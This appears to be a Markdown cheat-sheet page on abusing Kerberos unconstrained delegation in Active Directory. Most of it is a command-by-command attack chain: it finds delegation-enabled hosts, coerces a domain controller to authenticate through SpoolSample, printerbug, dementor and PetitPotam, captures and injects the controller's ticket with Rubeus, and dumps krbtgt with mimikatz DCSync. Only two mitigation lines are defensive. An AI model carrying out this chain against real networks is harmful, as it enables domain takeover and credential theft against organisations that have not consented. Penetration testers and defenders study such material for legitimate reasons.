129 lines
5.1 KiB
Markdown
129 lines
5.1 KiB
Markdown
# Kerberos Delegation - Unconstrained Delegation
|
|
|
|
> The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user. - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
|
|
|
|
> When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
|
|
|
|
:warning: Unconstrained delegation used to be the only option available in Windows 2000
|
|
|
|
> **Warning**
|
|
> Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
|
|
|
|
## SpoolService Abuse with Unconstrained Delegation
|
|
|
|
The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
|
|
|
|
**Requirements**:
|
|
- Object with Property **Trust this computer for delegation to any service (Kerberos only)**
|
|
- Must have **ADS_UF_TRUSTED_FOR_DELEGATION**
|
|
- Must not have **ADS_UF_NOT_DELEGATED** flag
|
|
- User must not be in the **Protected Users** group
|
|
- User must not have the flag **Account is sensitive and cannot be delegated**
|
|
|
|
### Find delegation
|
|
|
|
:warning: : Domain controllers usually have unconstrained delegation enabled.
|
|
Check the `TRUSTED_FOR_DELEGATION` property.
|
|
|
|
* [ADModule](https://github.com/samratashok/ADModule)
|
|
```powershell
|
|
# From https://github.com/samratashok/ADModule
|
|
PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
|
|
```
|
|
* [bloodyAD](https://github.com/CravateRouge/bloodyAD)
|
|
```ps1
|
|
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' --attr sAMAccountName,userAccountControl
|
|
```
|
|
|
|
* [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
|
```powershell
|
|
$> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10
|
|
grep TRUSTED_FOR_DELEGATION domain_computers.grep
|
|
```
|
|
|
|
* [CrackMapExec module](https://github.com/mpgn/CrackMapExec/wiki)
|
|
```powershell
|
|
cme ldap 10.10.10.10 -u username -p password --trusted-for-delegation
|
|
```
|
|
|
|
* BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
|
|
* Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
|
|
|
|
|
|
### SpoolService status
|
|
|
|
Check if the spool service is running on the remote host
|
|
|
|
```powershell
|
|
ls \\dc01\pipe\spoolss
|
|
python rpcdump.py DOMAIN/user:password@10.10.10.10
|
|
```
|
|
|
|
### Monitor with Rubeus
|
|
|
|
Monitor incoming connections from Rubeus.
|
|
|
|
```powershell
|
|
Rubeus.exe monitor /interval:1
|
|
```
|
|
|
|
### Force a connect back from the DC
|
|
|
|
Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.
|
|
|
|
> SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.
|
|
|
|
```powershell
|
|
# From https://github.com/leechristensen/SpoolSample
|
|
.\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
|
|
.\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
|
|
# DC01.HACKER.LAB is the domain controller we want to compromise
|
|
# HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
|
|
|
|
# From https://github.com/dirkjanm/krbrelayx
|
|
printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>
|
|
|
|
# From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
|
|
python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>
|
|
```
|
|
|
|
If the attack worked you should get a TGT of the domain controller.
|
|
|
|
### Load the ticket
|
|
|
|
Extract the base64 TGT from Rubeus output and load it to our current session.
|
|
|
|
```powershell
|
|
.\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
|
|
```
|
|
|
|
Alternatively you could also grab the ticket using Mimikatz : `mimikatz # sekurlsa::tickets`
|
|
|
|
Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
|
|
|
|
|
|
### Mitigation
|
|
|
|
* Ensure sensitive accounts cannot be delegated
|
|
* Disable the Print Spooler Service
|
|
|
|
|
|
## MS-EFSRPC Abuse with Unconstrained Delegation
|
|
|
|
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
|
|
|
```bash
|
|
# Coerce the callback
|
|
git clone https://github.com/topotam/PetitPotam
|
|
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
|
python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
|
|
|
|
# Extract the ticket
|
|
.\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
|
|
```
|
|
|
|
|
|
## References
|
|
|
|
* [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
|
|
* [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1) |